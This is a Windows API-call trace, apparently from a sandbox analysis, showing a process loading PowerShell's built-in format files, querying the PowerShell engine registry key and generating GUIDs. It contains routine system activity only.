	[0596.608] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.608] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0596.608] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0xbce, lpOverlapped=0x0) returned 1
	[0596.609] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfe6fe, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfe6fe*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0596.609] ReadFile (in: hFile=0x2f0, lpBuffer=0x2cfefc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2cfefc8*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0596.609] CloseHandle (hObject=0x2f0) returned 1
	[0596.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0596.609] SetErrorMode (uMode=0x1) returned 0x1
	[0597.742] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd60 | out: lpFileInformation=0xccd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0597.742] SetErrorMode (uMode=0x1) returned 0x1
	[0597.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0597.742] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce48 | out: phkResult=0xcce48*=0x2f0) returned 0x0
	[0597.742] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccdcc, lpData=0x0, lpcbData=0xccdc8*=0x0 | out: lpType=0xccdcc*=0x1, lpData=0x0, lpcbData=0xccdc8*=0x56) returned 0x0
	[0597.742] CoTaskMemAlloc (cb=0x5a) returned 0x1b3b7ea0
	[0597.742] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd9c, lpData=0x1b3b7ea0, lpcbData=0xccd98*=0x56 | out: lpType=0xccd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd98*=0x56) returned 0x0
	[0597.742] CoTaskMemFree (pv=0x1b3b7ea0) 
	[0597.742] RegCloseKey (hKey=0x2f0) returned 0x0
	[0597.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0597.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0597.744] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x5233e493, Data2=0x4483, Data3=0x484c, Data4=([0]=0xb7, [1]=0xa7, [2]=0x98, [3]=0x7d, [4]=0xda, [5]=0xf7, [6]=0x9f, [7]=0xb5))) returned 0x0
	[0597.744] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xf11cf708, Data2=0x7898, Data3=0x4b6c, Data4=([0]=0xb3, [1]=0xd3, [2]=0x3c, [3]=0x7b, [4]=0xd2, [5]=0x42, [6]=0x26, [7]=0x24))) returned 0x0
	[0597.745] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xfc49fffe, Data2=0x4c40, Data3=0x4d84, Data4=([0]=0xaf, [1]=0x53, [2]=0x4c, [3]=0x90, [4]=0x43, [5]=0x4, [6]=0x3, [7]=0x88))) returned 0x0
	[0597.745] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xdefe2483, Data2=0x4dd2, Data3=0x4032, Data4=([0]=0x9b, [1]=0xaf, [2]=0x17, [3]=0xfb, [4]=0x90, [5]=0x69, [6]=0x20, [7]=0x2d))) returned 0x0
	[0597.746] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xf9a52c7f, Data2=0x39b1, Data3=0x4524, Data4=([0]=0x87, [1]=0xaf, [2]=0xe2, [3]=0x91, [4]=0x98, [5]=0x8d, [6]=0xf3, [7]=0x58))) returned 0x0
	[0597.746] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xcb1a49cb, Data2=0xa8f, Data3=0x4f78, Data4=([0]=0x87, [1]=0xe6, [2]=0x7, [3]=0xb2, [4]=0xec, [5]=0xa0, [6]=0x4, [7]=0xd2))) returned 0x0
	[0597.747] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0597.748] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x35fb8547, Data2=0xe22d, Data3=0x488a, Data4=([0]=0x92, [1]=0xff, [2]=0x6a, [3]=0xfd, [4]=0xb, [5]=0xd6, [6]=0xfb, [7]=0x63))) returned 0x0
	[0597.748] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0597.750] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0597.751] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xff7c362b, Data2=0xf6d0, Data3=0x4b1a, Data4=([0]=0xb6, [1]=0x1e, [2]=0x11, [3]=0xfc, [4]=0x3b, [5]=0xc0, [6]=0xbb, [7]=0x69))) returned 0x0
	[0597.751] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xd66506a4, Data2=0x5b8c, Data3=0x4b40, Data4=([0]=0x88, [1]=0x46, [2]=0x4b, [3]=0xfc, [4]=0xba, [5]=0x22, [6]=0x9f, [7]=0xc7))) returned 0x0
	[0597.751] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x939f571b, Data2=0x19ff, Data3=0x4ec6, Data4=([0]=0xaf, [1]=0xe7, [2]=0xc7, [3]=0xea, [4]=0x24, [5]=0x93, [6]=0xf4, [7]=0xc5))) returned 0x0
	[0597.751] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x65b8a2dd, Data2=0xb101, Data3=0x43b3, Data4=([0]=0xb1, [1]=0x53, [2]=0x5c, [3]=0xc9, [4]=0x1e, [5]=0xe7, [6]=0xe2, [7]=0x43))) returned 0x0
	[0597.751] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x7545aa2a, Data2=0xfbe5, Data3=0x40bf, Data4=([0]=0xb5, [1]=0xe8, [2]=0xc9, [3]=0x6d, [4]=0xd7, [5]=0xd9, [6]=0x12, [7]=0xd0))) returned 0x0
	[0597.752] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x693a3723, Data2=0x5023, Data3=0x4baf, Data4=([0]=0xae, [1]=0x72, [2]=0x7f, [3]=0x8f, [4]=0x50, [5]=0xb9, [6]=0x74, [7]=0x85))) returned 0x0
	[0597.752] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x7d135b3e, Data2=0xef82, Data3=0x4437, Data4=([0]=0x99, [1]=0xe6, [2]=0x15, [3]=0x55, [4]=0x92, [5]=0x1a, [6]=0x2b, [7]=0xf3))) returned 0x0
	[0597.752] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x8b9022a5, Data2=0x860d, Data3=0x420f, Data4=([0]=0xa5, [1]=0xa3, [2]=0x6, [3]=0xa, [4]=0x70, [5]=0xae, [6]=0xd8, [7]=0x4f))) returned 0x0
	[0597.752] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x38ee9c5, Data2=0x3c82, Data3=0x4ae0, Data4=([0]=0x97, [1]=0xa7, [2]=0xa, [3]=0xb2, [4]=0x29, [5]=0x87, [6]=0x12, [7]=0x28))) returned 0x0
	[0597.752] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x97445f5, Data2=0x2186, Data3=0x4d9d, Data4=([0]=0xaa, [1]=0xd7, [2]=0x63, [3]=0xb8, [4]=0xe5, [5]=0x24, [6]=0x80, [7]=0xbe))) returned 0x0
	[0597.752] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x2abdbc5, Data2=0xfe74, Data3=0x44f0, Data4=([0]=0x82, [1]=0x24, [2]=0x89, [3]=0x6, [4]=0xd1, [5]=0xe3, [6]=0x88, [7]=0x1e))) returned 0x0
	[0597.753] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x21f6027c, Data2=0x5e66, Data3=0x4cd8, Data4=([0]=0x8a, [1]=0x3e, [2]=0xc9, [3]=0xba, [4]=0xdd, [5]=0x62, [6]=0x91, [7]=0x5a))) returned 0x0
	[0597.753] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xe7586fba, Data2=0x2fcc, Data3=0x440e, Data4=([0]=0xb2, [1]=0xa8, [2]=0xb5, [3]=0xae, [4]=0xa9, [5]=0xa8, [6]=0x5b, [7]=0x52))) returned 0x0
	[0597.753] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x74efbee0, Data2=0x351, Data3=0x4046, Data4=([0]=0xb8, [1]=0x91, [2]=0x57, [3]=0xc, [4]=0xa7, [5]=0xd5, [6]=0x7f, [7]=0x49))) returned 0x0
	[0597.753] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x98776583, Data2=0xf69d, Data3=0x4f86, Data4=([0]=0xa3, [1]=0x1d, [2]=0x9d, [3]=0xd9, [4]=0xb3, [5]=0x71, [6]=0x19, [7]=0x26))) returned 0x0
	[0597.753] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x3f0291fb, Data2=0x5925, Data3=0x4f2d, Data4=([0]=0x84, [1]=0x36, [2]=0x2, [3]=0x3e, [4]=0x90, [5]=0x12, [6]=0xbb, [7]=0x9a))) returned 0x0
	[0597.753] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x772c5370, Data2=0x5d92, Data3=0x45d6, Data4=([0]=0xb3, [1]=0x1d, [2]=0xa7, [3]=0xa4, [4]=0x8f, [5]=0xc1, [6]=0x70, [7]=0xe2))) returned 0x0
	[0597.753] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x6be04c8c, Data2=0x64ce, Data3=0x4ab0, Data4=([0]=0xaa, [1]=0x77, [2]=0xb3, [3]=0x24, [4]=0x7f, [5]=0x28, [6]=0x72, [7]=0x6c))) returned 0x0
	[0597.754] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xd7a6a72b, Data2=0xf94c, Data3=0x437b, Data4=([0]=0xa6, [1]=0x7f, [2]=0x8f, [3]=0xd0, [4]=0x60, [5]=0xec, [6]=0x1e, [7]=0x2a))) returned 0x0
	[0597.754] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x8d52b806, Data2=0x9a95, Data3=0x449a, Data4=([0]=0x8b, [1]=0x14, [2]=0xb, [3]=0xc0, [4]=0xa7, [5]=0xc5, [6]=0xcd, [7]=0x40))) returned 0x0
	[0597.754] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x7aaa839a, Data2=0x9698, Data3=0x43aa, Data4=([0]=0x9c, [1]=0xc9, [2]=0xc, [3]=0xe3, [4]=0x1e, [5]=0x34, [6]=0x62, [7]=0xcd))) returned 0x0
	[0597.754] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x9dce53ff, Data2=0x2c75, Data3=0x4379, Data4=([0]=0x82, [1]=0x6f, [2]=0xa1, [3]=0x1f, [4]=0x9c, [5]=0x72, [6]=0xfb, [7]=0x93))) returned 0x0
	[0597.754] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x1db04e2b, Data2=0x40d7, Data3=0x45cc, Data4=([0]=0x9a, [1]=0x97, [2]=0xf9, [3]=0x2e, [4]=0x82, [5]=0x8, [6]=0xa6, [7]=0xdd))) returned 0x0
	[0597.754] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x641f2b36, Data2=0x2173, Data3=0x4de7, Data4=([0]=0xb0, [1]=0xd9, [2]=0x7, [3]=0xf9, [4]=0xe8, [5]=0x79, [6]=0xd7, [7]=0x59))) returned 0x0
	[0597.754] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x903e4483, Data2=0xc9f, Data3=0x4925, Data4=([0]=0xa4, [1]=0x56, [2]=0xdc, [3]=0xd3, [4]=0xe7, [5]=0x0, [6]=0x8d, [7]=0x3e))) returned 0x0
	[0597.755] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x9d08ee5f, Data2=0xeb13, Data3=0x4cdf, Data4=([0]=0xac, [1]=0x3c, [2]=0xd, [3]=0xe9, [4]=0xa8, [5]=0xed, [6]=0xc3, [7]=0xa))) returned 0x0
	[0597.755] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xa65ba898, Data2=0xd02a, Data3=0x45d4, Data4=([0]=0x85, [1]=0xdc, [2]=0x8d, [3]=0xa3, [4]=0xce, [5]=0x77, [6]=0x54, [7]=0x1b))) returned 0x0
	[0597.755] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x57d5ac4a, Data2=0x3f0a, Data3=0x4bfa, Data4=([0]=0x9c, [1]=0x35, [2]=0x77, [3]=0x89, [4]=0x6, [5]=0x79, [6]=0x7c, [7]=0xae))) returned 0x0
	[0597.755] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x7da52824, Data2=0xbd3c, Data3=0x4233, Data4=([0]=0xb0, [1]=0x79, [2]=0x95, [3]=0x1a, [4]=0xe9, [5]=0xed, [6]=0x6, [7]=0xc3))) returned 0x0
	[0597.756] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xea60cefa, Data2=0xddcb, Data3=0x4c28, Data4=([0]=0x8e, [1]=0x4d, [2]=0xeb, [3]=0x2a, [4]=0x7b, [5]=0x37, [6]=0xfd, [7]=0xa8))) returned 0x0
	[0597.756] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0597.756] GetFileType (hFile=0x2f0) returned 0x1
	[0597.756] SetErrorMode (uMode=0x1) returned 0x1
	[0597.756] GetFileType (hFile=0x2f0) returned 0x1
	[0597.756] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e0f5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f5b0*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0597.757] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e0f5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f5b0*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0597.757] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e0f5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f5b0*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0597.757] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e0f5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f5b0*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0597.757] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e0f5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f5b0*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0597.757] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e0f5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f5b0*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0597.760] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e0f5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f5b0*, lpNumberOfBytesRead=0xccdb8*=0x119, lpOverlapped=0x0) returned 1
	[0597.760] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e0f5b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f5b0*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0597.760] CloseHandle (hObject=0x2f0) returned 1
	[0599.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0599.433] SetErrorMode (uMode=0x1) returned 0x1
	[0599.433] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd60 | out: lpFileInformation=0xccd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0599.434] SetErrorMode (uMode=0x1) returned 0x1
	[0599.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0599.434] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce48 | out: phkResult=0xcce48*=0x2f0) returned 0x0
	[0599.434] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccdcc, lpData=0x0, lpcbData=0xccdc8*=0x0 | out: lpType=0xccdcc*=0x1, lpData=0x0, lpcbData=0xccdc8*=0x56) returned 0x0
	[0599.434] CoTaskMemAlloc (cb=0x5a) returned 0x1b3b7ea0
	[0599.434] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd9c, lpData=0x1b3b7ea0, lpcbData=0xccd98*=0x56 | out: lpType=0xccd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd98*=0x56) returned 0x0
	[0599.434] CoTaskMemFree (pv=0x1b3b7ea0) 
	[0599.434] RegCloseKey (hKey=0x2f0) returned 0x0
	[0599.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0599.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0599.435] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xf6dfb5a3, Data2=0xe0dc, Data3=0x45fc, Data4=([0]=0x98, [1]=0x21, [2]=0xe, [3]=0x39, [4]=0xf3, [5]=0x2f, [6]=0x2f, [7]=0xc8))) returned 0x0
	[0599.436] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xf9c73946, Data2=0x6938, Data3=0x497c, Data4=([0]=0xb7, [1]=0xe0, [2]=0x4e, [3]=0x22, [4]=0xb7, [5]=0x64, [6]=0x65, [7]=0x45))) returned 0x0
	[0599.436] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xb7b07858, Data2=0x33d7, Data3=0x4614, Data4=([0]=0x94, [1]=0x4f, [2]=0x3, [3]=0x5d, [4]=0x95, [5]=0xc0, [6]=0x20, [7]=0x96))) returned 0x0
	[0599.436] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x47c4cb91, Data2=0x2320, Data3=0x4594, Data4=([0]=0x8b, [1]=0xd9, [2]=0x14, [3]=0xa5, [4]=0x51, [5]=0x38, [6]=0x9f, [7]=0x8b))) returned 0x0
	[0599.436] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0599.436] GetFileType (hFile=0x2f0) returned 0x1
	[0599.436] SetErrorMode (uMode=0x1) returned 0x1
	[0599.437] GetFileType (hFile=0x2f0) returned 0x1
	[0599.437] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.437] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.437] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.437] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.437] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.438] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.438] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.438] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.440] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.440] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.440] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.441] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0599.441] ReadFile (in: hFile=0x2f0, lpBuffer=0x2e6b750, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e6b750*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
